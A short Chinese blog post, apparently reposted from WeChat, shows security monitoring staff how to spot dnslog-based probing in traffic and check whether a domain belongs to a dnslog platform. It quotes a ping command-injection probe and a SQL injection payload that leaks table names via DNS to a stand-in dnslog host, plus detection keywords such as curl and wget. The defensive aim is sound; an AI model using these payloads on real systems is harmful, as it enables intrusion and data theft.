dnslog攻击流量简单分析
攻击方在对一个目标进行攻击时,会有一些漏洞探测的动作。当遇到没有回显的命令执行和注入时,会采用结合dnslog的方式。
命令执行漏洞:
ping www.xx.comSQL注入漏洞:(对于刚接入这方面的同学可能有点不太能看懂,可以多去网上了解一下这种)
load_file(CONCAT('\', (select hex(table_name) from information_schema.tables where table_schema=database() limie 0,1), '.xx.dnslog.com'))一般会从安全告警设备中发现,安全设备监控人员,发现类似攻击探测后,提取出攻击者使用的dnslog平台地址。
还有一些情况,看的是全流量设备。这种情况下没有告警,只能根据经验搜索了。我们可以关注一些关键词,命令执行类:ping、curl、wget,SQL注入类:load_file(、EXEC(、EXECUTE 等。
接下来我们去到 “站长工具” 网站,将我们从安全设备告警中提取出来的dnslog地址,进行ping或者DNS查询操作。
如果返回结果是127.0.0.1那么就是dnslog,如果不是保留地址那么则不是dnslog的。
获取到的dnslog地址:(例子是以dnslog平台的为例)
jd71a3.dnslog.cn这里进行的是DNS查询操作:
可以看见返回结果是:127.0.0.1 是dnslog平台构造的地址。
原文始发于微信公众号(青春计协):dnslog攻击流量简单分析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论